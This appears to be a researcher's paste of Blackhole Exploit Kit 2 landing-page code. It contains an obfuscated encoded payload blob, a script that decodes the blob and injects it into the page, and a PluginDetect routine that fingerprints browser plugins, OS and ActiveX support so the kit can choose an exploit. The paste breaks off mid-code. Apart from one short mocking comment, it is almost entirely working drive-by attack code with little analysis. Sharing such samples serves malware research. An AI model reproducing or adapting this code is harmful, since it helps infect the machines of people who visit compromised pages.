0="!4k4i51534m^414i18384c_4l47494e2k$454k45434k(2d534m454i@4j494f4e2a&1a201m271m+281a1k4e41%4d452a1a38)4c4l47494e#2k454k4543*4k1a1k4841!4e444c454i^2a464l4e43_4k494f4e1g$431k421k41(1h534i454k@4l4i4e1846&4l4e434k49+4f4e1g1h53%431g421k41)1h55551k49#4j2k454649*4e45442a46!4l4e434k49^4f4e1g421h_534i454k4l$4i" 29="i*1m4f43501a!3l2b464f4i^1g462d202b_462c4a1m4c$454e474k48(2b461j1j1h@5349461g43&1m47454k2h+3g371g4a3j%463l1h1h53)431m2h434k#494m453g2l*4e41424c45!442d4k4i4l^452b424i45_414b555555$431m494j2n(45434b4f2d@1g1n2n4543&4b4f1n491h+1m4k454j4k%1g481h1e1e)1g1n2n4543#4b4f3k4j1i*3k1n3k4j1i!3k441n491h^1m4k454j4k_1" 48="4f44454j1h_53464f4i1g$422d441m44(494m1m4348@494c44364f&44454j1m4c+454e474k48%1l212b422e)2d202b421l#1l1h53432d*441m44494m!1m4348494c^44364f4445_4j3j423l2b$49461g431e(1e431m4348@494c44364f&44454j1h53+464f4i1g48%2d431m4348)494c44364f#44454j1m4c*454e474k48!1l212b482e^2d202b481l_1l1h53472d$431m434849(4c4" 15="471g4b1h2f_3j4b3l2a4b$2b464f4i1g(442d202b44@2c4a1m4c45&4e474k482b+441j1j1h53%49461g1g46)2d451m4841#4j35494d45*3c514g451g!4a3j443l1h^1h1e1e1g46_2d461m454e$41424c4544(384c4l4749@4e1h1h534c&2d461m4445+4j434i494g%4k494f4e54)54482b412d#461m4e414d*455454482b!49461g421m^4k454j4k1g_4c1h545442$1m4k454j4k(1g4" 83="1m1c%212e481h1h)53482d3a45#472l504g1m*1c21555555!43414k4348^1g491h5355_471m494e4j$4k414c4c45(442d482f21@2a1g422f20&2a1l211h55+49461g1947%1m4m454i4j)494f4e1h53#471m4m454i*4j494f4e2d!441m464f4i^4d414k364l_4d1g481h55$471m31363b(3c2h34342l@2k3j4b3l2d&471m494e4j+4k414c4c45%4455551k52)522a205555#2b384c4l4" 19="e444f4n1m$2h434k494m(453g37424a@45434k1k47&454k2h3g37+2a464l4e43%4k494f4e1g)411h534m41#4i18462d4e*4l4c4c1k44!1k422d4k48^494j1k432d_53552b4k4i$5153462d4e(454n18421m@2h3g371g41&1h5543414k+43481g441h%53554i454k)4l4i4e1846#551k434f4e*4m454i4k2m!4l4e434j2a^464l4e434k_494f4e1g46$1h534m414i(18411k471k@441k" 21="e43)4k494f4e1g#451k421k44*1h534m414i!18411k432b^49461g451h_5349461g45$3j423j203l(3l2d2d2154@54441h5346&4f4i1g412d+202b412c42%1m4c454e47)4k482b412d#411j221h53*453j423j41!3l3l2d423j^411j213l55_55464f4i1g$4118494e18(451h53432d@453j413l2b&49461g431e+1e433j423j%203l3l2d2d)211h534k48#494j1m494e*494k37424a" 51="f*4e1g1h534m!414i18432d^4k48494j1k_411k422b49$461g19431m(4n494e344f@414445441h&534i454k4l+4i4e554946%1g431m3f34)464l4e434j#1e1e431m3f*34464l4e43!4j1m4c454e^474k481e1e_431m3f3446$4l4e434j3j(431m3f3446@4l4e434j1m&4c454e474k+481l213l19%2d2d4e4l4c)4c1h534i45#4k4l4i4e55*464f4i1g41!18494e1843^1h53422d43_3" 62="j*4553471m41!4g4g454e44^2j48494c44_1g411h5549$461g441h53(471m4i454d@4f4m452j48&494c441g44+1h5555454c%4j45535555)1k494e4j45#4i4k303c35*342a464l4e!434k494f4e^1g471k421k_481k411k4c$1h534m414i(184d1k4e2d@444f434l4d&454e4k1k4b+2d4k48494j%1k4h1k4g2d)4e1m434i45#414k452l4c*454d454e4k!1g1a4j4g41^4e1a1h1k4f_1" 23="424a1g43(1k3j1a1c1a@1k433l1h2b&464f4i1g46+18494e1843%1m384c4l47)494e4j1h53#49461g431m*384c4l4749!4e4j3j463l^1h53431m49_4e494k3742$4a1g431m38(4c4l47494e@4j3j463l1k&3j1a1c1a1k+431k1a1c1c%1a1k431m38)4c4l47494e#4j3j463l3l*1k211h5555!2b431m373b^2d2120202b_49461g421h$534m414i18(442d3j1a3f@494e1a1k21&1k1a3" 46="f4e45+2l4d4g4k51%2k494m1h53)411m4f4e2k#4f4e452l4d*4g4k512k49!4m1g1h5555^1k4n494e34_4f41444544$2a46414c4j(451k1c1c4f@4e3f494e44&4f4n344f41+4445442a46%4l4e434k49)4f4e1g411h#534i454k4l*4i4e18464l!4e434k494f^4e1g421h53_49461g411m$4n494e344f(414445441h@53411m4341&4c4c1g421h+55454c4j45%53411m4638)4l4j481g" 4="1h2f1g441m_494j2k4546$494e45441g(431h2f4e45@4n183a4547&2l504g1g43+1h2a441m47%454k364l4d)3a4547501h#1m45504543*1g421h2a4e!4l4c4c2b4i^454k4l4i4e_18412f413j$203l2a4e4l(4c4c551k43@4f4d4g414i&45364l4d4j+2a464l4e43%4k494f4e1g)481k461k44#1h534m414i*18452d4k48!494j1k431k^421k411k47_2d4g414i4j$45314e4k2b(494" 11="!4i454k4l4i^4e18465555_55554i454k$4l4i4e184e(4l4c4c5555@1k46494e44&36414m384c+4l47494e2a%464l4e434k)494f4e1g4c#1k451k431h*534m414i18!4a2d4k4849^4j1k482d4e_454n183a45$472l504g1g(4c1k1a491a@1h1k442d1g&194a1m494j+2k4546494e%45441g451h)5454451h2f#1n3k441n2a*201k4b2d43!2f4e454n18^3a45472l50_4g1g431k1a$49" 66="!4e474k482b^4f2d4f1j22_1h5349461g$1n3j3m3k4j(3l1n1m4k45@4j4k1g423j&4f1j213l1h+1h534h1j2d%423j4f3l1j)1f2d1a1f1j#423j4f1j21*3l1j1f1a18!1f55554h1j^2d1a2e1a2b_464f4i1g4f$2d202b4f2c(481m4c454e@474k482b4f&2d4f1j221h+5349461g1n%3j3m3k4j3l)1n1m4k454j#4k1g483j4f*1j213l1h1h!534h1j2d46^1j1f4g414i_414d184e41$4d" 56="1e1e1g19(431m494j31@2l5454431m&47454k2k37+354f424a1g%4d1h1m4i45)4144513b4k#414k452d2d*241h1h5349!461g194d1m^4n494e344f_414445441e$1e431m4n49(4e344f4144@45441h534i&454k4l4i4e+1821554946%1g4d1m4n49)4e344f4144#45441e1e43*1m494j364l!4d1g421h1h^5349461g19_431m494j36$4l4d1g4d1m(434f4l4e4k@1h1h534d1m&434f4" 64="4e452b&424f4i4445+4i1l4j4k51%4c452a4e4f)4e452b4g41#4444494e47*2a204g502b!4d414i4749^4e2a204g50_2b4m494j49$42494c494k(512a4m494j@49424c452b&1a2b49461g+194b1m494j%2k4546494e)45441g411h#1h53412d1a*1a5549461g!4b1m494j3b^4k4i494e47_1g471h1e1e$1g1n3j3m3k(4j3l1n1h1m@4k454j4k1g&471h1h5347+2d471m4k4f%344f4n4" 24="54143+1a1k221k1a%34494e4l50)1a1k231k1a#2m4i45452i*3b2k1a1k24!1k1a493848^4f4e451a1k_22211m211k$1a49384f44(1a1k22211m@221k1a4938&41441a1k22+211m231k1a%3f494e1m1i)2j2l1a1k22#221m211k1a*3f494e1m1i!354f42494c^451a1k2222_1m221k1a38$4f434b454k(3k3k4j1i38@2j1a1k2222&1m231k1a1a+1k2120203l%2b464f4i1g)462d441m" 61="481h%535555472d)1g4a1m4745#4k2l4c454d*454e4k4j2i!513c414736^414d451g1a_424f44511a$1h3j203l54(544a1m424f@44511h2b49&461g471h53+49461g471m%46494i4j4k)2j48494c44#1e1e461m49*4j2k454649!4e45441g47^1m494e4j45_4i4k2i4546$4f4i451h1h(53471m494e@4j454i4k2i&45464f4i45+1g411k471m%46494i4j4k)2j48494c44#1h55454c4" 91="4i#41201m4k51*4g452d212b!4i41201m4f^4g454e1g1h_2b4i41201m$3f4i494k45(1g4i41221m@4i454j4g4f&4e4j452i4f+44511h2b4i%41201m3b41)4m453c4f2m#494c451g4i*41241k221h!2b4i41201m^2j4c4f4j45_1g1h2b5543$414k43481g(451h53554k@4i51534n49&4k481g4i41+211h534j48%454c4c4550)45434l4k45#1g4i41241h*2b55554341!4k43481g45^" 32="h1n)491h1m4k45#4j4k1g491h*2b431m4m45!4i3b414641^4i492d431m_494j3b4146$414i491e1e(1g1n3e454i@4j494f4e3k&4j1i3k1n3k+4j1i1g3k44%3j3k443k1m)3l1i1h1n49#1h1m4k454j*4k1g491h2f!431m464f4i^4d414k364l_4d1g3a4547$2l504g1m1c(211h2a4e4l@4c4c2b431m&494j374g45+4i412d1g1n%374g454i41)3k4j1i3j3k#1n3l2f3k4j*1i1g3k441j" 37="424c45441e_1e44192d2d$1a4a414m41(1a1h53411m@4j4k414k4l&4j2d1l222b+4i454k4l4i%4e18415541)1m4j4k414k#4l4j2d212b*4i454k4l4i!4e1841551k^46384l4j48_2a464l4e43$4k494f4e1g(421k411h53@4m414i1843&2d4k48494j+2b49461g43%1m494j2h4i)4i41511g41#1h1e1e1g43*1m494j2m4l!4e431g421h^54541g431m_494j2h4i4i$41511g421h(1e1" 7="d*414k364l4d!2a464l4e43^4k494f4e1g_421k431h53$4m414i1844(2d4k48494j@1k411k452b&49461g1944+1m494j3b4k%4i364l4d1g)421h1h534i#454k4l4i4e*184e4l4c4c!5549461g19^441m494j36_4l4d1g431h$1h53432d24(55431l1l2b@452d421m4i&454g4c4143+451g1n3k4j%1n471k1a1a)1h1m4j4g4c#494k1g441m*4j4g4c494k!364l4d3a45^47501h1m43_4" 68="c454d+454e4k1g1a%44494m1a1h)2b4b1m4449#4m1m49442d*4b1m44494m!312k554b1m^4j454k3b4k_514c451g4b$1m44494m1k(431m434f4e@43414k1g3j&1a4n49444k+481a1k4b1m%44494m3f49)444k481j1a#4g501a1k1a*4845494748!4k1a1k1g4b^1m4g4c4l47_494e3b4952$451j231h1j(1a4g501a1k@1a464f4e4k&3b4952451a+1k1g4b1m4g%4c4l47494e)3b495245" 26="1a48454144_1a1h3j203l$5454444f43(4l4d454e4k@1m47454k2l&4c454d454e+4k4j2i513c%414736414d)451g1a424f#44511a1h3j*203l545444!4f434l4d45^4e4k1m424f_445154544e$4l4c4c1h2b(431m494j31@2l2d1g4e45&4n182m4l4e+434k494f4e%1g1a4i454k)4l4i4e181a#1j451j1a1i*2g43433n4f!4e192g1i1a^1j451j1a46_414c4j451a$1h1h1g1h2b(431" 27="m4m454i@312l2d431m&494j312l1e+1e1g1n353b%312l3k4j1i)1g3k441j3k#1m2f3k441i*1h1n491h1m!4k454j4k1g^491h2f4g41_4i4j452m4c$4f414k1g3a(45472l504g@1m1c211k21&201h2a4e4l+4c4c2b431m%2h434k494m)453g2l4e41#424c45442d*46414c4j45!2b49461g43^1m494j312l_1h534m414i$18461k4a2d(3j1a354j50@4d4c221m3g&3534303c3c+381a1k" 41="82d53552b$49461g451m(4j4k414k4l@4j2c201h53&4i454k4l4i+4e184e4l4c%4c552b462d)451m4g4c4l#47494e2b49*461g461m47!454k3e454i^4j494f4e2k_4f4e45192d$211h53461m(47454k3e45@4i4j494f4e&1g4e4l4c4c+1k441k431h%2b49461g46)1m47454k3e#454i4j494f*4e2k4f4e45!2d2d2d4e4l^4c4c1h5346_1m47454k3e$454i4j494f(4e2k4f4e45@2d21" 71="a4g501a@1k1a4c494e&4530454947+484k1a1k1g%4b1m4g4c4l)47494e3b49#52451j231h*1j1a4g501a!1k1a4m454i^4k4943414c_2h4c49474e$1a1k1a4241(4j454c494e@451a1k1a44&494j4g4c41+511a1k1a49%4e4c494e45)1a3l1h1h2b#4k4i51534g*1m494e4e45!4i303c3534^2d4h554341_4k43481g4d$1h53552b4k(4i51534b1m@44494m1m41&4g4g454e44+2j4849" 39="4k4l%4i4e55431m)43414c4c1g#423j413l1h*2b423j413l!2d4e4l4c4c^5555551k43_414c4c2a46$4l4e434k49(4f4e1g431h@534m414i18&422d4k4849+4j1k412d42%1m494j2h4i)4i41511g43#1h2f431m4c*454e474k48!2a1l212b49^461g412e20_1e1e421m49$4j2m4l4e43(1g433j203l@1h1h53433j&203l1g421k+412e212f43%3j213l2a20)1k412e222f#433j223l2" 5="61g451m@494j3b4k4i&364l4d1g48+1h1e1e451m%494j3b4k4i)364l4d1g46#1h1h534946*1g451m494j!2k4546494e^45441g441h_1e1e441m43$4f4d4g414i(45364l4d4j@1h534i454k&4l4i4e1844+1m434f4d4g%414i45364l)4d4j1g481k#461h55432d*481m4j4g4c!494k1g451m^4j4g4c494k_364l4d3a45$47501h2b42(2d461m4j4g@4c494k1g45&1m4j4g4c49+4k364l" 25="4c#454e474k48*1l222b462e!2d202b462d^461l221h53_49461g443j$463l1e1e4e(454n183a45@472l504g1g&443j463l1k+1a491a1h1m%4k454j4k1g)421h1h5343#1m373b2d44*3j461j213l!2b424i4541^4b55555543_1m434f4e4m$454i4k2m4l(4e434j1g43@1h2b431m48&4541442d1g+444f434l4d%454e4k1m47)454k2l4c45#4d454e4k4j*2i513c4147!36414d451g^" 45="1h53431g(1h5555551k@3f34464l4e&434j202a3j+3l1k3f3446%4l4e434j2a)3j3l1k4i4l#4e3f34464l*4e434j2a46!4l4e434k49^4f4e1g411h_534m414i18$422d53552b(411m4n494e@344f414445&442d4k4i4l+452b411m43%414c4c2h4i)4i41511g41#1m3f34464l*4e434j201h!2b411m4341^4c4c2h4i4i_41511g411m$3f34464l4e(434j1h2b49@461g411m4f&4e2k4" 43="k2a)464l4e434k#494f4e1g44*1k431h534m!414i18452d^4k48494j1k_412d4n494e$444f4n1k42(2b49461g45@1m494j2m4l&4e431g431h+1h5349461g%411m414444)2l4m454e4k#34494j4k45*4e454i1h53!411m414444^2l4m454e4k_34494j4k45$4e454i1g44(1k431k4641@4c4j451h55&454c4j4553+49461g411m%414k4k4143)482l4m454e#4k1h53411m*414k4k4143" 40="a*201k412e23!2f433j233l^2a201h5545_4c4j455349$461g421m49(4j2m4l4e43@1g431h1h53&431g421h55+55551k4745%4k3e454i4j)494f4e2k45#4c494d494k*454i2a1a1k!1a1k1c1c47^454k3e454i_4j494f4e2a$464l4e434k(494f4e1g41@1h534i454k&4l4i4e1846+4l4e434k49%4f4e1g471k)441k431h53#4m414i1845*2d411m494e!494k1g471h^1k461k421k_4" 17="4i4j%494f4e5454)191g452d48#1m47454k36*4l4d1g461m!4m454i4j49^4f4e1h1h1h_534i454k4l$4i4e184255(49461g1942@1h534i454k&4l4i4e1845+55452d481m%464f4i4d41)4k364l4d1g#451h2b422d*481m464f4i!4d414k364l^4d1g421h2b_442d421m4j$4g4c494k1g(481m4j4g4c@494k364l4d&3a4547501h+2b472d451m%4j4g4c494k)1g481m4j4g#4c494k364" 65="54i)2j414j451g#1h1m4i454g*4c4143451g!1n3k4j1n47^1k1a1a1h2b_4h2d461j47$1j1f184n49(444k482d1a@1f1j4b1m4g&4c4l47494e+3b4952451j%1f1a184845)4947484k2d#1a1f1j4b1m*4g4c4l4749!4e3b495245^1j1f1a181f_2b4h1j2d1f$4j4k514c45(2d1a1f1j49@1j1f44494j&4g4c41512a+494e4c494e%452b1a181f)2b464f4i1g#4f2d202b4f*2c421m4c45" 3="51#4g454f4618*422d2d1a4j!4k4i494e47^1a1e1e1g1n_3k441n1h1m$4k454j4k1g(421h1h551k@47454k364l&4d3a454750+2a1n3j3k44%3l3j3k443k)1m3k3n1k1l#3l1i1n1k4j*4g4c494k36!4l4d3a4547^502a1n3j3k_1m3k3n1k1l$3l1n471k47(454k364l4d@2a464l4e43&4k494f4e1g+421k431h53%4m414i1844)2d4k48494j#1k412d441m*494j3b4k4i!364l4d1g42^" 90="c4l43+4b514g454k%4j4g454k4j)494k4k494e#471m434f4d*1n4c494e4b!4j1n4i454k^4l4i4e1l4n_454j4k1m4g$484g2f484a(494l464d2d@2325204120&2520252328+1e4e4h482d%2024202223)2823242327#2323202623*2520242023!1e4e4b452d^20241e454a_472d51524f$1e4e504j47(494m452d4b@4h484n511a&1k46414c4j+451h2b4i41%221m4j454e)441g1h2b" 75="4i454k&4l4i4e1821+555549461g%451m47454k)35494d452l#4e41424c45*44384c4l47!494e1g431k^461h1h534i_454k4l4i4e$1821554i45(4k4l4i4e18@20551k4745&4k3e454i4j+494f4e2a46%4l4e434k49)4f4e1g4c1k#4a1h534m41*4i18472d4k!48494j1k44^2d471m1c1k_491k461k4d$1k4e1k422d(4e4l4c4c1k@482d4e4l4c&4c1k4b2d47+1m4d494d45%3c514g4" 13="f4e4k+45504k1j3a%45472l504g)1m4i494748#4k2j4f4e4k*45504k1h1h!1h54541g48^1m4k454j4k_1g421h1e1e$1g19445454(441m4k454j@4k1g3a4547&2l504g1m4c+45464k2j4f%4e4k45504k)1j3a45472l#504g1m4i49*47484k2j4f!4e4k45504k^1h1h1h1h53_49461g194b$5454191g4b(1m4k454j4k@1g4d1h5454&4b1m4k454j+4k1g421h1h%1h534i454k)4l4i4e18" 38="e421m4c@454e474k48&2e201e1e43+1m494j2m4l%4e431g423j)203l1h1h1h#1h53411m4g*4l4j481g42!1h55551k43^414c4c2h4i_4i41512a46$4l4e434k49(4f4e1g421h@534m414i18&432d4k4849+4j1k412b49%461g431m49)4j2h4i4i41#511g421h1h*53464f4i1g!412d202b41^2c421m4c45_4e474k482b$411j1j1h53(49461g423j@413l2d2d2d&4e4l4c4c1h+534i45" 20="422d1n&3m3j3k1c3l+3j3k1c3l1n%1k432d4k48)494j2b464f#4i1g411849*4e18461h53!49461g421m^4k454j4k1g_411h1h534k$4i5153472d(411m4j4c49@43451g221h&2b49461g47+1m4c454e47%4k482e201e)1e19463j47#3l1h53463j*473l2d463j!413l1g461h^2b44454c45_4k4518463j$413l555543(414k43481g@441h535555&55551k494e+494k37424a%2a464l4" 67="452d1a1f(1j483j4f3l@1j1f1a184m&414c4l452d+1a1f1j483j%4f1j213l1j)1f1a181n2e#1f55554h1j*2d411j461j!1a1n1a1j47^1j1a2e1a55_454c4j4553$4h2d415549(461g194b1m@44494m1h53&4a2d4e1m47+454k2l4c45%4d454e4k2i)5131441g4b#1m44494m31*2k1h2b4946!1g4a1h534b^1m44494m2d_4a55454c4j$45534b1m44(494m2d4e1m@434i45414k&452l4" 74="l21212j2m$1l2h22242k(1l24242425@2523252420&2020201a1k+31363b3c2h%34342l2k2a)53551k4g4c#4l47494e30*414j35494d!453c514g45^2a464l4e43_4k494f4e1g$441k431k46(1h534m414i@18422d4k48&494j1k452d+421m1c1k41%2b464f4i1g)4118494e18#441h534946*1g443j413l!1e1e443j41^3l1m4k514g_451e1e443j$413l1m4k51(4g452d2d43@1h53" 73="h*55551k384c!4l47494e4j^2a5341444f_42454i4541$44454i2a53(4d494d453c@514g452a1a&414g4g4c49+43414k494f%4e1n4g4446)1a1k4e414m#384c4l4749*4e37424a2a!4e4l4c4c1k^4g4i4f4731_2k2a3j1a2h$434i4f382k(2m1m382k2m@1a1k1a382k&2m1m384446+2j4k4i4c1a%3l1k434c41)4j4j312k2a#1a434c4j49*442a2j2h28!2h29272820^1l2228202k_1" 54="e18)1l21551k47#454k3c4147*3b4k414k4l!4j2a464l4e^434k494f4e_1g4d1k471k$411k421h53(4m414i1843@2d4k48494j&1k461k4b2d+4d1m4j4g41%4e1k4c2d43)1m47454k3f#49444k481g*4b1h1k482d!411m4j4g41^4e1k4a2d43_1m47454k3f$49444k481g(481h1k442d@471m4j4g41&4e1k492d43+1m47454k3f%49444k481g)441h2b4946#1g194b5454*1948545419" 59="1j221h534k_4i5153463j$473j413l3l(2d473j411j@213l554341&4k43481g44+1h53555555%551k494e4j)454i4k2k49#4m314e2i4f*44512a464l!4e434k494f^4e1g411k49_1h534m414i$18481k462d(4k48494j1k@422d1a4g44&2323292923+2329291a1k%442d4e4l4c)4c1k4a2d49#2f4n494e44*4f4n1m4k4f!4g1m444f43^4l4d454e4k_2a4n494e44$4f4n1m444f(434" 92="1h53555543_414k43481g$451h535555(43414k4348@1g454i4i4e&4f1h535544+4f434l4d45%4e4k1m4n4i)494k451g1f#1f1h2b4j45*4k3c494d45!4f4l4k1g45^4e443n4i45_44494i4543$4k1k262020(20201h2b" 76="51k)411k432b49#461g441m49*4j3b4k4i49!4e471g4a1h^1h534a2d4a_1m4i454g4c$4143451g1n(3k4j1n471k@1a1a1h2b49&461g4a1h53+4b2d4a5555%454c4j4553)4a2d4e4l4c#4c5549461g*441m494j2k!4546494e45^441g471m31_363b3c2h34$342l2k3j4b(3l1h1h5347@1m494e4j4k&414c4c4544+2d471m3136%3b3c2h3434)2l2k3j4b3l#2b4i454k4l*4i4e554946" 88="!4k4k4i4942^4l4k451g1a_49441a1k4i$41231h2b4i(41231m4j45@4k2h4k4k4i&49424l4k45+1g1a434c41%4j4j49441a)1k1a434c4j#49442a2i2k*29262j2525!261l26252h^231l21212k_201l292823$2h1l20202j(20242m2j22@292l23261a&1h2b4k4i51+534m414i18%4i41202d4i)41231m2j4i#45414k4537*424a45434k!1g1a41444f^441a1m434f_4e43414k1g$1a" 2="22d2d+1a464l4e43%4k494f4e1a)551k494j3b#4k4i494e47*2a464l4e43!4k494f4e1g^421h534i45_4k4l4i4e18$4k514g454f(4618422d2d@1a4j4k4i49&4e471a551k+494j364l4d%2a464l4e43)4k494f4e1g#421h534i45*4k4l4i4e18!4k514g454f^4618422d2d_1a4e4l4d42$454i1a551k(494j3b4k4i@364l4d2a46&4l4e434k49+4f4e1g421h%534i454k4l)4i4e1g4k" 72="4c44%1g4g1h5543)414k43481g#4d1h53552b*4i454k4l4i!4e534j4g41^4e2a4g1k4n_494e344f41$4445442a4b(1m4n494e34@4f41444544&1k4k414736+414d452a47%1k4f4l4k45)4i303c3534#2a4h55554i*454k4l4i4e!534j4g414e^2a4e4l4c4c_1k4n494e34$4f41444544(2a4b1m4n49@4e344f4144&45441k4k41+4736414d45%2a1a1a1k4f)4l4k454i30#3c35342a4" 18="l*4d3a454750!1h2b464f4i^1g412d202b_412c441m4c$454e474k48(2b411j1j1h@5349461g43&2e1l211e1e+412e431e1e%443j413l19)2d1a201a1h#534i454k4l*4i4e184255!49461g473j^413l192d44_3j413l1h53$49461g432d(2d1l211h53@432d415549&461g443j41+3l192d1a20%1a1h534i45)4k4l4i4e18#425555554i*454k4l4i4e!1845551k2h^3g372a4n49_4" 63="k4a1k462d$1a2c1a2b4m(414i18432d@3j1a4f4l4k&4c494e453b+4k514c451a%1k1a4e4f4e)451a1k1a42#4f4i44454i*3b4k514c45!1a1k1a4e4f^4e451a1k1a_4g41444449$4e471a1k1a(204g501a1k@1a4d414i47&494e1a1k1a+204g501a1k%1a4m494j49)42494c494k#511a1k1a4m*494j49424c!451a3l2b4m^414i18492d_1a4f4l4k4c$494e451l4j(4k514c452a@4e4f" 9="1g201k&241h1m4a4f+494e1g1a1k%1a1h551k1c)1c48414j35#494d453c51*4g452a464l!4e434k494f^4e1g411h53_4i454k4l4i$4e18464l4e(434k494f4e@1g431h5349&461g19411m+494j312l1e%1e431h534m)414i18461k#451k421k44*2d411m494j!2h4i4i4151^1g431h2f43_2a1g411m49$4j3b4k4i49(4e471g431h@2f3j433l2a&3j3l1h2b46+4f4i1g422d%202b422" 14="41#3j463l5555*554i454k4l!4i4e184e4l^4c4c551k47_454k35494d$452l4e4142(4c4544384c@4l47494e2a&464l4e434k+494f4e1g4b%1k4d1k431h)534m414i18#452d4k4849*4j1k461k42!2d4e454n18^3a45472l50_4g1g4d1k1a$491a1h1k48(2d1a1a1k47@2d432f4e45&4n183a4547+2l504g1g43%1k1a491a1h)2a201k411k#4c1k441k4a*2d451m494j!3b4k4i494e^"></span><script>
- if(zxc){var q=asd();
- var s="",a="";
- for(i=0;i<93;i++){
- s+=asd2();
- }
- s=s.replace(/[^a-z0-9]+/g,"");
- for(i=0;i<s.length;i+=2){
- window.asd3();
- }
- try{window.document.body=s}catch(awt){asd4()}}
- </script></body></html>
- ---------------------------------------------------------------------------------------
- // BHEK2 Plugin Detect.....these morons never learns...
- // I won't spend my time to PDF and jar I aimed straingt PE infectors..
- // You guys can go ahead with jar and PDF
- // rgds, @unixfreaxjp
- try {
- var PluginDetect = {
- version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
- return function (){
- c(b, a)
- }
- }
- , isDefined : function (b){
- return typeof b != "undefined"
- }
- , isArray : function (b){
- return (/array/i).test(Object.prototype.toString.call(b))
- }
- , isFunc : function (b){
- return typeof b == "function"
- }
- , isString : function (b){
- return typeof b == "string"
- }
- , isNum : function (b){
- return typeof b == "number"
- }
- , isStrNum : function (b){
- return (typeof b == "string" && (/\d/).test(b))
- }
- , getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g,
- getNum : function (b, c){
- var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
- exec(b) : null;
- return a ? a[0] : null
- }
- , compareNums : function (h, f, d){
- var e = this , c, b, a, g = parseInt;
- if (e.isStrNum(h) && e.isStrNum(f)){
- if (e.isDefined(d) && d.compareNums){
- return d.compareNums(h, f)
- }
- c = h.split(e.splitNumRegx);
- b = f.split(e.splitNumRegx);
- for (a = 0; a < Math.min(c.length, b.length);
- a ++ ){
- if (g(c[a], 10) > g(b[a], 10)){
- return 1
- }
- if (g(c[a], 10) < g(b[a], 10)){
- return - 1
- }
- }
- }
- return 0
- }
- , formatNum : function (b, c){
- var d = this , a, e;
- if (!d.isStrNum(b)){
- return null
- }
- if (!d.isNum(c)){
- c = 4
- }
- c--;
- e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
- for (a = 0; a < 4; a ++ ){
- if (/^(0+)(.+)$/.test(e[a])){
- e[a] = RegExp.$2
- }
- if (a > c ||! (/\d/).test(e[a])){
- e[a] = "0"
- }
- }
- return e.slice(0, 4).join(",")
- }
- , $$hasMimeType : function (a){
- return function (c){
- if (!a.isIE && c){
- var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
- for (b = 0; b < d.length; b ++ ){
- if (a.isString(d[b]) &&/ [ ^\ s] / .test(d[b])){
- f = navigator.mimeTypes[d[b]];
- e = f ? f.enabledPlugin : 0;
- if (e && (e.name || e.description)){
- return f
- }
- }
- }
- }
- return null
- }
- }
- , findNavPlugin : function (l, e, c){
- var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ?/\ d /: 0, k = c ?
- new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
- for (f = 0; f < a.length; f ++ ){
- m = a[f].description || g;
- b = a[f].name || g;
- if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
- test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
- if (!k ||! (k.test(m) || k.test(b))){
- return a[f]
- }
- }
- }
- return null
- }
- , getMimeEnabledPlugin : function (k, m, c){
- var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
- l, d, j = e.isString(k) ? [k] : k;
- for (d = 0; d < j.length; d ++ ){
- if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
- l = f.description || h;
- a = f.name || h;
- if (b.test(l) || b.test(a)){
- if (!g ||! (g.test(l) || g.test(a))){
- return f
- }
- }
- }
- }
- return 0
- }
- , getPluginFileVersion : function (f, b){
- var h = this , e, d, g, a, c =- 1;
- if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
- return b
- }
- if (!b){
- return e
- }
- e = h.formatNum(e);
- b = h.formatNum(b);
- d = b.split(h.splitNumRegx);
- g = e.split(h.splitNumRegx);
- for (a = 0; a < d.length; a ++ ){
- if (c >- 1 && a > c && d[a] != "0"){
- return b
- }
- if (g[a] != d[a]){
- if (c ==- 1){
- c = a
- }
- if (d[a] != "0"){
- return b
- }
- }
- }
- return e
- }
- , AXO : window.ActiveXObject, getAXO : function (a){
- var f = null, d, b = this , c = {
- }
- ;
- try {
- f = new b.AXO(a)
- }
- catch (d){
- }
- return f
- }
- , convertFuncs : function (f){
- var a, g, d, b =/^ [ \ $][ \ $] /, c = this ;
- for (ain f){
- if (b.test(a)){
- try {
- g = a.slice(2);
- if (g.length > 0 &&! f[g]){
- f[g] = f[a](f);
- deletef[a]
- }
- }
- catch (d){
- }
- }
- }
- }
- , initObj : function (e, b, d){
- var a, c;
- if (e){
- if (e[b[0]] == 1 || d){
- for (a = 0; a < b.length; a = a + 2){
- e[b[a]] = b[a + 1]
- }
- }
- for (ain e){
- c = e[a];
- if (c && c[b[0]] == 1){
- this .initObj(c, b)
- }
- }
- }
- }
- , initScript : function (){
- var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
- b = a.platform || "", h = a.product || "";
- c.initObj(c, ["$", c]);
- for (fin c.Plugins){
- if (c.Plugins[f]){
- c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
- }
- }
- ;
- c.OS = 100;
- if (b){
- var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
- 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
- , 100];
- for (f = d.length - 2; f >= 0; f = f - 2){
- if (d[f] && new RegExp(d[f], "i").test(b)){
- c.OS = d[f + 1];
- break
- }
- }
- }
- c.convertFuncs(c);
- c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
- "body")[0] || document.body || null);
- c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
- c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
- null ;
- c.ActiveXEnabled = false;
- if (c.isIE){
- var f, j = ["Msxml2.XMLh00p", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
- "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
